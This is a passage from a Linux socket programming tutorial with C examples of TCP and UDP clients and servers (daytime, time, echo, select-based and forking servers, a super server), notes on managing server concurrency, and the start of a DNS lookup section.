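/* Server side: read until the client's half-close shows up as
 * end of file, then send the reply and close. */
int drain_then_reply(int fd, const char *reply)
{
    char tmp[256];
    ssize_t n;

    while ((n = read(fd, tmp, sizeof(tmp))) > 0)
        ;                                  /* discard the request bytes */
    if (n < 0)
        return -1;
    if (write(fd, reply, strlen(reply)) < 0)
        return -1;
    return close(fd);
}
```

Both helpers work on any connected stream socket, so they can be tried locally on the two ends of a socketpair(AF_UNIX, SOCK_STREAM, 0, sv) with the server side running in a forked child.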

Connected vs Unconnected UDP Sockets

A client can call connect with a UDP socket or not.
If connect is called, read and write will work.
Without connect, the client needs to send with a system call that specifies the remote endpoint, such as sendto().
Without connect, it can be useful to receive data with a system call that reports the remote endpoint, such as recvfrom().
Connect with TCP involves a special message exchange sequence.
Connect with UDP sends no messages, so you can connect to non-existent servers.

Communicating with UDP

UDP data is always a complete message (datagram).
Whatever is specified in a write becomes a datagram.
The receiver receives the complete datagram unless fewer bytes are read.
Reading in a loop for a single datagram is pointless with UDP.
close() is adequate, since shutdown() does not send any messages.
UDP is unreliable, so UDP software needs its own error protocol.
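The difference between the two styles can be sketched with a few loopback helpers. This is a minimal illustration, not part of the original client library: the helper names are hypothetical, and the sockets are bound to 127.0.0.1 with kernel-chosen ports so the code can run on one machine.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Create a UDP socket bound to 127.0.0.1 on a kernel-chosen port;
 * the resulting address is returned through bound. */
int udp_loopback_socket(struct sockaddr_in *bound)
{
    socklen_t len = sizeof(*bound);
    int s = socket(AF_INET, SOCK_DGRAM, 0);

    if (s < 0)
        return -1;
    memset(bound, 0, sizeof(*bound));
    bound->sin_family = AF_INET;
    bound->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    bound->sin_port = 0;                     /* let the kernel pick */
    if (bind(s, (struct sockaddr *)bound, sizeof(*bound)) < 0 ||
        getsockname(s, (struct sockaddr *)bound, &len) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* Unconnected send: the destination is named on every call. */
ssize_t send_unconnected(int s, const struct sockaddr_in *to, const char *msg)
{
    return sendto(s, msg, strlen(msg), 0,
                  (const struct sockaddr *)to, sizeof(*to));
}

/* Connected send: connect() only records the peer, no packet is
 * sent, and afterwards plain write() works. */
ssize_t send_connected(int s, const struct sockaddr_in *to, const char *msg)
{
    if (connect(s, (const struct sockaddr *)to, sizeof(*to)) < 0)
        return -1;
    return write(s, msg, strlen(msg));
}

/* Receive exactly one datagram and report who sent it. */
ssize_t recv_with_sender(int s, char *buf, size_t cap, struct sockaddr_in *from)
{
    socklen_t len = sizeof(*from);
    return recvfrom(s, buf, cap, 0, (struct sockaddr *)from, &len);
}
```

Each call to recv_with_sender() returns one whole datagram, so two sends of 3 and 6 bytes arrive as two separate reads of 3 and 6 bytes rather than one 9-byte stream.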
Client Example: Some Variations

A Simple Client Library

To make a connection, a client must:

1. select UDP or TCP...
2. determine a server's IP address...
3. determine the proper port...
4. make the socket call...
5. make the connect call...

Frequently the calls are essentially the same. A library offers normal capability with a simple interface.
connectTCP()

The following is a code segment example using the connectTCP() function.

int connectTCP(const char *host, const char *service)
{
    return connectsock(host, service, "tcp");
}

connectUDP()

The following is a code segment example using the connectUDP() function.

int connectUDP(const char *host, const char *service)
{
    return connectsock(host, service, "udp");
}

connectsock()

The following is a code segment example using the connectsock() function.

int connectsock(const char *host, const char *service, const char *transport)
{
    struct hostent *phe;     /* pointer to host information entry */
    struct servent *pse;     /* pointer to service information entry */
    struct protoent *ppe;    /* pointer to protocol information entry */
    struct sockaddr_in sin;  /* an Internet endpoint address */
    int s, type;             /* socket descriptor and socket type */

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;

    /* Map service name to port number */
    if ((pse = getservbyname(service, transport)))
        sin.sin_port = pse->s_port;
    else if ((sin.sin_port = htons((u_short)atoi(service))) == 0)
        errexit("can't get \"%s\" service entry\n", service);

    /* Map host name to IP address, allowing for dotted decimal */
    if ((phe = gethostbyname(host)))
        memcpy(&sin.sin_addr, phe->h_addr, phe->h_length);
    else if ((sin.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
        errexit("can't get \"%s\" host entry\n", host);

    /* Map transport protocol name to protocol number */
    if ((ppe = getprotobyname(transport)) == 0)
        errexit("can't get \"%s\" protocol entry\n", transport);

    /* Use protocol to choose a socket type */
    if (strcmp(transport, "udp") == 0)
        type = SOCK_DGRAM;
    else
        type = SOCK_STREAM;

    /* Allocate a socket */
    s = socket(PF_INET, type, ppe->p_proto);
    if (s < 0)
        errexit("can't create socket: %s\n", strerror(errno));

    /* Connect the socket */
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        errexit("can't connect to %s.%s: %s\n", host, service, strerror(errno));
    return s;
}
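On current systems the same host and service mapping is often done with getaddrinfo(), which resolves both names in one call and also covers IPv6. The sketch below is an alternative to connectsock(), not the tutorial's own code: the name connect_by_name() is hypothetical, and it returns -1 instead of calling errexit().

```c
#define _POSIX_C_SOURCE 200809L  /* expose getaddrinfo() under strict -std modes */
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Resolve host and service, then connect to the first address that
 * works. socktype is SOCK_STREAM for TCP or SOCK_DGRAM for UDP.
 * Returns a connected socket, or -1 on failure. */
int connect_by_name(const char *host, const char *service, int socktype)
{
    struct addrinfo hints, *res, *ai;
    int s = -1;
    int rc;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;        /* accept IPv4 or IPv6 */
    hints.ai_socktype = socktype;

    rc = getaddrinfo(host, service, &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc));
        return -1;
    }
    for (ai = res; ai != NULL; ai = ai->ai_next) {
        s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (s < 0)
            continue;                   /* try the next address */
        if (connect(s, ai->ai_addr, ai->ai_addrlen) == 0)
            break;                      /* connected */
        close(s);
        s = -1;
    }
    freeaddrinfo(res);
    return s;
}
```

As with connectsock(), service may be a name such as "daytime" or a decimal port string, and host may be a name or a numeric address.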
A TCP DAYTIME Client

DAYTIME service prints date and time.
TCP version sends upon connection. Server reads no client data.
UDP version sends upon receiving any message.

The following is a code segment example implementing the TCP Daytime.

#define LINELEN 128

void TCPdaytime(const char *host, const char *service);

int main(int argc, char *argv[])
{
    /* host to use if none supplied */
    char *host = "localhost";
    /* default service port */
    char *service = "daytime";

    switch (argc) {
    case 1:
        host = "localhost";
        break;
    case 3:
        service = argv[2];
        /* FALL THROUGH */
    case 2:
        host = argv[1];
        break;
    default:
        fprintf(stderr, "usage: TCPdaytime [host [port]]\n");
        exit(1);
    }
    TCPdaytime(host, service);
    exit(0);
}

void TCPdaytime(const char *host, const char *service)
{
    /* buffer for one line of text */
    char buf[LINELEN+1];
    /* socket, read count */
    int s, n;

    s = connectTCP(host, service);
    while ((n = read(s, buf, LINELEN)) > 0) {
        /* ensure null-terminated */
        buf[n] = '\0';
        (void) fputs(buf, stdout);
    }
}
A UDP TIME Client

The TIME service is for computers.
Returns seconds since 1-1-1900.
Useful for synchronizing and time-setting.
TCP and UDP versions return time as a 32-bit integer in network byte order.
Need to use ntohl() to convert, then subtract the seconds between 1-1-1900 and 1-1-1970 before handing the value to ctime().

The following is a code segment example implementing UDP Time.

#define MSG "What time is it?\n"
#define UNIXEPOCH 2208988800UL  /* seconds from 1-1-1900 to 1-1-1970 */

int main(int argc, char *argv[])
{
    char *host = "localhost";   /* host to use if none supplied */
    char *service = "time";     /* default service name */
    uint32_t netnow;            /* 32-bit integer to hold time from the server */
    time_t now;                 /* the same time as a UNIX time value */
    int s, n;                   /* socket descriptor, read count */

    switch (argc) {
    case 1:
        host = "localhost";
        break;
    case 3:
        service = argv[2];
        /* FALL THROUGH */
    case 2:
        host = argv[1];
        break;
    default:
        fprintf(stderr, "usage: UDPtime [host [port]]\n");
        exit(1);
    }
    s = connectUDP(host, service);
    (void) write(s, MSG, strlen(MSG));

    /* Read the time */
    n = read(s, (char *)&netnow, sizeof(netnow));
    if (n < 0)
        errexit("read failed: %s\n", strerror(errno));

    /* put in host byte order and convert to the UNIX epoch */
    now = (time_t)(ntohl(netnow) - UNIXEPOCH);
    printf("%s", ctime(&now));
    exit(0);
}
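A value counted from 1-1-1900 needs two conversions before ctime() can print it: from network to host byte order, and from the 1900 epoch to the 1970 epoch that time_t uses. A minimal sketch of that conversion as a standalone helper follows; the names TIME_1900_TO_1970 and time_reply_to_unix() are hypothetical.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <time.h>

/* Seconds between 1900-01-01 and 1970-01-01, both at 00:00 UTC:
 * 70 years including 17 leap days, times 86400 seconds per day. */
#define TIME_1900_TO_1970 2208988800UL

/* Convert the 4-byte TIME reply (still in network byte order)
 * into a UNIX time value. */
time_t time_reply_to_unix(uint32_t wire_value)
{
    uint32_t since_1900 = ntohl(wire_value);
    return (time_t)((int64_t)since_1900 - (int64_t)TIME_1900_TO_1970);
}
```

Reading the reply into a uint32_t rather than a time_t matters on platforms where time_t is 64 bits wide, because the server sends only four bytes.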
TCP and UDP Echo Clients

main() is like the other clients.

TCPecho() function

The following is a code segment example for using the TCPecho() function.

int TCPecho(const char *host, const char *service)
{
    char buf[LINELEN+1];    /* buffer for one line of text */
    int s, n;               /* socket descriptor, read count */
    int outchars, inchars;  /* characters sent and received */

    s = connectTCP(host, service);
    while (fgets(buf, sizeof(buf), stdin)) {
        /* ensure line null-terminated */
        buf[LINELEN] = '\0';
        outchars = strlen(buf);
        (void) write(s, buf, outchars);

        /* read it back */
        for (inchars = 0; inchars < outchars; inchars += n) {
            n = read(s, &buf[inchars], outchars - inchars);
            if (n < 0)
                errexit("socket read failed: %s\n", strerror(errno));
            /* a return of 0 means the server closed; without this check the loop never ends */
            if (n == 0)
                errexit("socket closed by server\n");
        }
        fputs(buf, stdout);
    }
    return 0;
}
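The read-back loop in TCPecho() is an instance of a general pattern: on a stream socket, keep reading until the expected number of bytes has arrived. A small sketch of that pattern as a reusable helper is shown below. The name read_full() is hypothetical, and treating EINTR as "try again" is a design choice of this sketch.

```c
#include <errno.h>
#include <sys/types.h>
#include <unistd.h>

/* Read exactly len bytes unless end of file or an error comes first.
 * Returns the number of bytes read (short only at end of file),
 * or -1 on error. */
ssize_t read_full(int fd, void *buf, size_t len)
{
    char *p = buf;
    size_t got = 0;

    while (got < len) {
        ssize_t n = read(fd, p + got, len - got);
        if (n == 0)
            break;                  /* peer closed the connection */
        if (n < 0) {
            if (errno == EINTR)
                continue;           /* interrupted by a signal, retry */
            return -1;
        }
        got += (size_t)n;
    }
    return (ssize_t)got;
}
```

With such a helper the inner loop of an echo client reduces to one call, read_full(s, buf, outchars), followed by a check that the result equals outchars.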

NETWORK PROGRAMMING LINUX SOCKET PART 7 - CODE SNIPPET EXAMPLES


Iterative, Connectionless Servers (UDP)

Creating a Passive UDP Socket

The following is sample code for a passive UDP socket.

int passiveUDP(const char *service)
{
    return passivesock(service, "udp", 0);
}

u_short portbase = 0;

int passivesock(const char *service, const char *transport, int qlen)
{
    struct servent *pse;
    struct protoent *ppe;
    struct sockaddr_in sin;
    int s, type;

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = INADDR_ANY;

    /* Map service name to port number */
    if ((pse = getservbyname(service, transport)))
        sin.sin_port = htons(ntohs((u_short)pse->s_port) + portbase);
    else if ((sin.sin_port = htons((u_short)atoi(service))) == 0)
        errexit("can't get \"%s\" service entry\n", service);

    /* Map protocol name to protocol number */
    if ((ppe = getprotobyname(transport)) == 0)
        errexit("can't get \"%s\" protocol entry\n", transport);

    /* Use protocol to choose a socket type */
    if (strcmp(transport, "udp") == 0)
        type = SOCK_DGRAM;
    else
        type = SOCK_STREAM;

    /* Allocate a socket */
    s = socket(PF_INET, type, ppe->p_proto);
    if (s < 0)
        errexit("can't create socket: %s\n", strerror(errno));

    /* Bind the socket */
    if (bind(s, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        errexit("can't bind to %s port: %s\n", service, strerror(errno));
    if (type == SOCK_STREAM && listen(s, qlen) < 0)
        errexit("can't listen on %s port: %s\n", service, strerror(errno));
    return s;
}

A TIME Server

The following is sample code for the Time server.

#define UNIXEPOCH 2208988800UL  /* seconds from 1-1-1900 to 1-1-1970 */

/* main() - Iterative UDP server for TIME service */
int main(int argc, char *argv[])
{
    struct sockaddr_in fsin;
    char *service = "time";
    char buf[1];
    int sock;
    time_t now;
    uint32_t netnow;    /* 32-bit time value sent on the wire */
    socklen_t alen;

    sock = passiveUDP(service);
    while (1) {
        alen = sizeof(fsin);
        if (recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&fsin, &alen) < 0)
            errexit("recvfrom: %s\n", strerror(errno));
        time(&now);
        /* convert to the 1900 epoch and to network byte order */
        netnow = htonl((uint32_t)(now + UNIXEPOCH));
        sendto(sock, (char *)&netnow, sizeof(netnow), 0, (struct sockaddr *)&fsin, sizeof(fsin));
    }
}

Iterative, Connection-Oriented Servers (TCP)

A DAYTIME Server

The following is sample code for the Daytime server.

void TCPdaytimed(int fd);

int passiveTCP(const char *service, int qlen)
{
    return passivesock(service, "tcp", qlen);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in fsin;
    char *service = "daytime";
    int msock, ssock;
    socklen_t alen;

    msock = passiveTCP(service, 5);
    while (1) {
        /* accept() needs the buffer size on input */
        alen = sizeof(fsin);
        ssock = accept(msock, (struct sockaddr *)&fsin, &alen);
        if (ssock < 0)
            errexit("accept failed: %s\n", strerror(errno));
        TCPdaytimed(ssock);
        close(ssock);
    }
}

void TCPdaytimed(int fd)
{
    char *pts;
    time_t now;

    time(&now);
    pts = ctime(&now);
    write(fd, pts, strlen(pts));
    return;
}

Close call requests a graceful shutdown.
Data in transit is reliably delivered.
Close requires messages and time.
If the server closes you may be safe.
If the client must close, the client may not cooperate.
In our simple server, a client can make rapid calls and use resources associated with the TCP shutdown timeout.

Concurrent, Connection-Oriented Servers (TCP)

The Value of Concurrency

An iterative server may block for excessive time periods.
An example is an echo server. A client could send many megabytes, blocking other clients for substantial periods.

A concurrent echo server could handle multiple clients simultaneously. Abusive clients would not affect polite clients as much.

A Concurrent Echo Server Using fork()

The following is sample code for a concurrent Echo server using fork().

int main(int argc, char *argv[])
{
    char *service = "echo";     /* service name or port number */
    struct sockaddr_in fsin;    /* the address of a client */
    socklen_t alen;             /* length of client's address */
    int msock;                  /* master server socket */
    int ssock;                  /* slave server socket */

    msock = passiveTCP(service, QLEN);
    signal(SIGCHLD, reaper);
    while (1) {
        alen = sizeof(fsin);
        ssock = accept(msock, (struct sockaddr *)&fsin, &alen);
        if (ssock < 0) {
            if (errno == EINTR)
                continue;
            errexit("accept: %s\n", strerror(errno));
        }
        switch (fork()) {
        case 0:     /* child */
            close(msock);
            exit(TCPechod(ssock));
        default:    /* parent */
            close(ssock);
            break;
        case -1:
            errexit("fork: %s\n", strerror(errno));
        }
    }
}

int TCPechod(int fd)
{
    char buf[BUFSIZ];
    int cc;

    while ((cc = read(fd, buf, sizeof buf))) {
        if (cc < 0)
            errexit("echo read: %s\n", strerror(errno));
        if (write(fd, buf, cc) < 0)
            errexit("echo write: %s\n", strerror(errno));
    }
    return 0;
}

void reaper(int sig)
{
    int status;

    /* with WNOHANG, 0 means children exist but none has exited yet, so stop */
    while (wait3(&status, WNOHANG, (struct rusage *)0) > 0)
        /* empty */;
}

Single-Process, Concurrent Servers (TCP)

Data-driven Processing

Arrival of data triggers processing.
A message is typically a request.
Server replies and awaits additional requests.
If processing time is small, it may be possible to handle the requests sequentially.
Timesharing would be necessary only when the processing load is too high for sequential processing.
Timesharing with multiple slaves is easier.

Using Select for Data-driven Processing

A process calls select to wait for one (or more) of a collection of open files (or sockets) to be ready for I/O.

int select(int n, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, struct timeval *timeout);
FD_CLR(int fd, fd_set *set);
FD_ISSET(int fd, fd_set *set);
FD_SET(int fd, fd_set *set);
FD_ZERO(fd_set *set);

select() returns the number of fd's ready for I/O.
FD_ISSET is used to determine which fd's are ready.
select() returns 0 if the timer expires.
select() returns -1 if there is an error.

An ECHO Server using a Single Process

The following is sample code for an Echo server using a single process.

int main(int argc, char *argv[])
{
    char *service = "echo";
    struct sockaddr_in fsin;
    int msock;
    fd_set rfds;
    fd_set afds;
    socklen_t alen;
    int fd, nfds;

    msock = passiveTCP(service, QLEN);
    nfds = getdtablesize();
    FD_ZERO(&afds);
    FD_SET(msock, &afds);
    while (1) {
        memcpy(&rfds, &afds, sizeof(rfds));
        if (select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0)
            errexit("select: %s\n", strerror(errno));
        if (FD_ISSET(msock, &rfds)) {
            int ssock;

            alen = sizeof(fsin);
            ssock = accept(msock, (struct sockaddr *)&fsin, &alen);
            if (ssock < 0)
                errexit("accept: %s\n", strerror(errno));
            FD_SET(ssock, &afds);
        }
        for (fd = 0; fd < nfds; ++fd)
            if (fd != msock && FD_ISSET(fd, &rfds))
                if (echo(fd) == 0) {
                    (void) close(fd);
                    FD_CLR(fd, &afds);
                }
    }
}

int echo(int fd)
{
    char buf[BUFSIZ];
    int cc;

    cc = read(fd, buf, sizeof buf);
    if (cc < 0)
        errexit("echo read: %s\n", strerror(errno));
    if (cc && write(fd, buf, cc) < 0)
        errexit("echo write: %s\n", strerror(errno));
    return cc;
}

Multiprotocol Servers

Why use multiple protocols in a server?

Using separate UDP and TCP servers gives the system administrator more flexibility.
Using separate servers results in 2 moderately simple servers.
Using one server eliminates duplicate code, simplifying software maintenance.
Using one server reduces the number of active processes.

A Multiprotocol DAYTIME Server

The following is sample code for a Multiprotocol Daytime server.

int main(int argc, char *argv[])
{
    char *service = "daytime";  /* service name or port number */
    char buf[LINELEN+1];        /* buffer for one line of text */
    struct sockaddr_in fsin;    /* the request from address */
    socklen_t alen;             /* from-address length */
    int tsock;                  /* TCP master socket */
    int usock;                  /* UDP socket */
    int nfds;
    fd_set rfds;                /* readable file descriptors */

    tsock = passiveTCP(service, QLEN);
    usock = passiveUDP(service);
    /* bit number of max fd */
    nfds = MAX(tsock, usock) + 1;
    FD_ZERO(&rfds);
    while (1) {
        FD_SET(tsock, &rfds);
        FD_SET(usock, &rfds);
        if (select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0)
            errexit("select error: %s\n", strerror(errno));
        if (FD_ISSET(tsock, &rfds)) {
            /* TCP slave socket */
            int ssock;

            alen = sizeof(fsin);
            ssock = accept(tsock, (struct sockaddr *)&fsin, &alen);
            if (ssock < 0)
                errexit("accept failed: %s\n", strerror(errno));
            daytime(buf);
            (void) write(ssock, buf, strlen(buf));
            (void) close(ssock);
        }
        if (FD_ISSET(usock, &rfds)) {
            alen = sizeof(fsin);
            if (recvfrom(usock, buf, sizeof(buf), 0, (struct sockaddr *)&fsin, &alen) < 0)
                errexit("recvfrom: %s\n", strerror(errno));
            daytime(buf);
            (void) sendto(usock, buf, strlen(buf), 0, (struct sockaddr *)&fsin, sizeof(fsin));
        }
    }
}

int daytime(char buf[])
{
    time_t now;

    (void) time(&now);
    sprintf(buf, "%s", ctime(&now));
    return 0;
}

Multiservice Servers

Why combine services into one server?

Fewer processes.
Less memory.
Less code duplication.
Server complexity is really a result of accepting connections and handling concurrency.
Having one server means the complex code does not need to be replicated.

Iterative Connectionless Server Design

Server opens multiple UDP sockets, each bound to a different port.
Server keeps an array of function pointers to associate each socket with a service function.
Server uses select to determine which socket (port) to service next and calls the proper service function.

Iterative Connection-Oriented Server Design

Server opens multiple passive TCP sockets, each bound to a different port.
Server keeps an array of function pointers to associate each socket with a service function.
Server uses select to determine which socket (port) to service next.
When a connection is ready, server calls accept to start handling a connection.
Server calls the proper service function.

Concurrent Connection-Oriented Server Design

Master uses select to wait for connections over a set of passive TCP sockets.
Master forks after accept.
Slave handles communication with the client.

Single-Process Server Design

Master uses select to wait for connections over a set of passive TCP sockets.
After each accept the new socket is added to the fd_set(s) as needed to handle client communication.
Complex if the client protocols are not trivial.

Invoking Separate Programs from a Server

Master uses select() to wait for connections over a set of passive TCP sockets.
Master forks after accept.
Child process uses execve to start a slave program to handle client communication.
Different protocols are separated, making it simpler to maintain.
Changes to a slave program can be implemented without restarting the master.
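The iterative multiservice designs above pair each socket with a service function and let select() decide which one to run next. A minimal sketch of that table-driven dispatch follows. The names svc_entry, dispatch_once() and note_and_drain() are hypothetical, the demo handler only drains its descriptor, and the table is assumed to hold at least one entry.

```c
#include <sys/select.h>
#include <sys/types.h>
#include <unistd.h>

struct svc_entry {
    int fd;                     /* descriptor to watch */
    int (*handler)(int fd);     /* service function for that descriptor */
};

/* Block until at least one descriptor in the table is readable, then
 * call the handler of every ready descriptor.
 * Returns the number of handlers called, or -1 if select() fails. */
int dispatch_once(struct svc_entry *tab, int n)
{
    fd_set rfds;
    int maxfd = -1, called = 0;
    int i;

    FD_ZERO(&rfds);
    for (i = 0; i < n; i++) {
        FD_SET(tab[i].fd, &rfds);
        if (tab[i].fd > maxfd)
            maxfd = tab[i].fd;
    }
    if (select(maxfd + 1, &rfds, NULL, NULL, NULL) < 0)
        return -1;
    for (i = 0; i < n; i++) {
        if (FD_ISSET(tab[i].fd, &rfds)) {
            tab[i].handler(tab[i].fd);
            called++;
        }
    }
    return called;
}

static int last_served = -1;    /* set by the demo handler below */

/* Demo handler: consume the pending data and remember which
 * descriptor was served. */
int note_and_drain(int fd)
{
    char buf[256];

    last_served = fd;
    return (int)read(fd, buf, sizeof(buf));
}
```

A server loop would call dispatch_once() repeatedly; for TCP services the handler of a passive socket would call accept() before doing its work.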

Multiservice, Multiprotocol Servers

Master uses select to wait for connections over a set of passive TCP sockets.
In addition the fd_set includes a set of UDP sockets awaiting client messages.
If a UDP message arrives, the master calls a handler function which formulates and issues a reply.
If a TCP connection request arrives, the master calls accept.
For simpler TCP connections, the master can handle read and write requests iteratively.
The master can also use select.
Lastly the master can use fork and let the child handle the connection.

Super Server Code Example

The following is sample code for a super server.

struct service {
    char *sv_name;
    char sv_useTCP;
    int sv_sock;
    int (*sv_func)(int);
};

struct service svent[] = {
    { "echo", TCP_SERV, NOSOCK, TCPechod },
    { "chargen", TCP_SERV, NOSOCK, TCPchargend },
    { "daytime", TCP_SERV, NOSOCK, TCPdaytimed },
    { "time", TCP_SERV, NOSOCK, TCPtimed },
    { 0, 0, 0, 0 },
};

int main(int argc, char *argv[])
{
    struct service *psv,        /* service table pointer */
        *fd2sv[NOFILE];         /* map fd to service pointer */
    int fd, nfds;
    fd_set afds, rfds;          /* readable file descriptors */

    nfds = 0;
    FD_ZERO(&afds);
    for (psv = &svent[0]; psv->sv_name; ++psv) {
        if (psv->sv_useTCP)
            psv->sv_sock = passiveTCP(psv->sv_name, QLEN);
        else
            psv->sv_sock = passiveUDP(psv->sv_name);
        fd2sv[psv->sv_sock] = psv;
        nfds = MAX(psv->sv_sock+1, nfds);
        FD_SET(psv->sv_sock, &afds);
    }
    (void) signal(SIGCHLD, reaper);
    while (1) {
        memcpy(&rfds, &afds, sizeof(rfds));
        if (select(nfds, &rfds, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) {
            if (errno == EINTR)
                continue;
            errexit("select error: %s\n", strerror(errno));
        }
        for (fd = 0; fd < nfds; ++fd) {
            if (FD_ISSET(fd, &rfds)) {
                psv = fd2sv[fd];
                if (psv->sv_useTCP)
                    doTCP(psv);
                else
                    psv->sv_func(psv->sv_sock);
            }
        }
    }
}

/* doTCP() - handle a TCP service connection request */
void doTCP(struct service *psv)
{
    /* the request from address */
    struct sockaddr_in fsin;
    /* from-address length */
    socklen_t alen;
    int fd, ssock;

    alen = sizeof(fsin);
    ssock = accept(psv->sv_sock, (struct sockaddr *)&fsin, &alen);
    if (ssock < 0)
        errexit("accept: %s\n", strerror(errno));
    switch (fork()) {
    case 0:
        break;
    case -1:
        errexit("fork: %s\n", strerror(errno));
    default:
        (void) close(ssock);    /* parent */
        return;
    }
    /* child */
    for (fd = NOFILE; fd >= 0; --fd)
        if (fd != ssock)
            (void) close(fd);
    exit(psv->sv_func(ssock));
}

/* reaper() - clean up zombie children */
void reaper(int sig)
{
    int status;

    /* with WNOHANG, 0 means children exist but none has exited yet, so stop */
    while (wait3(&status, WNOHANG, (struct rusage *)0) > 0)
        /* empty */;
}
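The same zombie clean-up can be written with waitpid() and installed with sigaction(). The sketch below is an assumption-laden variant, not the tutorial's code: reap_children(), sigchld_reaper() and install_reaper() are hypothetical names. With WNOHANG the call returns 0 when children exist but none has exited yet, so the loop has to test for a result greater than 0; a test for "greater than or equal to 0" would spin inside the handler.

```c
#define _POSIX_C_SOURCE 200809L  /* expose sigaction() under strict -std modes */
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Reap every child that has already exited, without blocking.
 * Returns how many children were reaped. */
int reap_children(void)
{
    int reaped = 0;
    int saved = errno;

    while (waitpid(-1, NULL, WNOHANG) > 0)
        reaped++;
    errno = saved;      /* do not disturb errno in the interrupted code */
    return reaped;
}

/* SIGCHLD handler built on the helper above. */
void sigchld_reaper(int sig)
{
    (void)sig;
    reap_children();
}

/* Install the handler; SA_RESTART lets interrupted system calls
 * restart instead of failing with EINTR.
 * Returns 0 on success, -1 on error. */
int install_reaper(void)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = sigchld_reaper;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_RESTART;
    return sigaction(SIGCHLD, &sa, NULL);
}
```

A forking server would call install_reaper() once before entering its accept loop.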

NETWORK PROGRAMMING LINUX SOCKET PART 8 - TCP & UDP PROGRAM EXAMPLES
Working program examples, if any, were compiled using gcc, tested using public IPs, and run on Linux/Fedora Core 3, with several updates applied, as a normal user. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to its default configuration.

Some Ideas in Managing Server Concurrency

Concurrency vs Iteration

Making the decision:

Program design is vastly different.
Programmer needs to decide early.
Network and computer speeds also keep changing.
Optimality is a moving target.
Programmer must use insight based on experience to decide which is better.

Level of Concurrency

Number of concurrent clients.
Iterative means 1 client at a time.
Unbounded concurrency allows flexibility.
TCP software limits the number of connections.
OS limits each process to a fixed number of open files.
OS limits the number of processes.

Problems with Unbounded Concurrency

OS can run out of resources such as memory, processes, sockets and buffers, causing blocking, thrashing, crashing...
Demand for one service can inhibit others, e.g. a web server may prevent other use.
Over-use can limit performance, e.g. an ftp server could be so slow that clients cancel requests, wasting the time spent doing a partial transfer.

Cost of Concurrency

Assuming a forking concurrent server, each connection requires time for a process creation (c).
Each connection also requires some time for processing requests (p).
Consider 2 requests arriving at the same time.
Iterative server completes both at time 2p.
Concurrent server completes both perhaps at time 2c+p.
If p < 2c the iterative server is faster, because then 2p < 2c+p.
The situation can get worse with more requests.
The number of active processes can exceed the CPU capacity.
Servers with heavy loads generally try to dodge the process creation cost.

Process Pre-allocation to Limit Delays

Master server process forks n times.
The n slaves handle up to n clients.
Operates like n iterative servers.
Because child processes inherit the parent's passive socket, the slaves can all wait in accept on the same socket.
For UDP, the slaves can all call recvfrom on the same socket.
To avoid problems like memory leaks, the slaves can be periodically replaced.
For UDP, bursts can overflow buffers, causing data loss. Pre-allocation can limit this problem.

Dynamic Pre-allocation

Pre-allocation can cause extra processing time if many slaves are all waiting on the same socket.
If the server is busy, it can be better to have many slaves pre-allocated.
If the server is idle, it can be better to have very few slaves pre-allocated.
Some servers (Apache) adjust the level of concurrency according to service demand.

Delayed Allocation

Rather than immediately forking, the master can quickly examine a request.
It may be faster for some requests to handle them in the master rather than forking.
Longer requests may be more appropriate to handle in a child process.
If it is hard to quickly estimate processing time, the server can set a timer to expire after a small time and then fork to let a child finish the request.

Client Concurrency

Shorter Response Time.
Increased Throughput.
Concurrency Allows Better Control.
Communicating with Multiple Servers.
Achieving Concurrency with a Single Client Process.

The Linux Socket Program Examples Sections

DNS

DNS stands for "Domain Name System" (in the Windows implementation it is called Domain Name Service). For sockets it has three major components:

1. Domain name space and resource records: Specifications for a tree-structured name space and the data associated with the names.
2. Name servers: Server programs that hold information about the domain tree structure and that set information.
3. Resolvers: Programs that extract information from name servers in response to client requests.

DNS is used to translate a domain name to an IP address and vice versa. This way, when someone enters:

telnet serv.google.com

telnet can find out that it needs to connect() to, let's say, "198.137.240.92". To get this information we can use gethostbyname():

#include <netdb.h>
struct hostent *gethostbyname(const char *name);

As you see, it returns a pointer to a struct hostent, and struct hostent is shown below:

struct hostent {
    char *h_name;
    char **h_aliases;
    int h_addrtype;
    int h_length;
    char **h_addr_list;
};
#define h_addr h_addr_list[0]

And the descriptions:

Member          Description
h_name          Official name of the host.
h_aliases       A NULL-terminated array of alternate names for the host.
h_addrtype      The type of address being returned; usually AF_INET.
h_length        The length of the address in bytes.
h_addr_list     A zero-terminated array of network addresses for the host. Host addresses are in Network Byte Order.
h_addr          The first address in h_addr_list.

Table 40.1

gethostbyname() returns a pointer to the filled struct hostent, or NULL on error. On error errno is not set; h_errno is set instead.

As said before, in implementation we use Domain Name Service in Windows and BIND in Unix/Linux. Here, we configure the Forward Lookup Zone for name to IP resolution and the Reverse Lookup Zone for the reverse.

The following is a program example using gethostbyname().

/*****getipaddr.c ******/
/****a hostname lookup program example******/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    struct hostent *h;

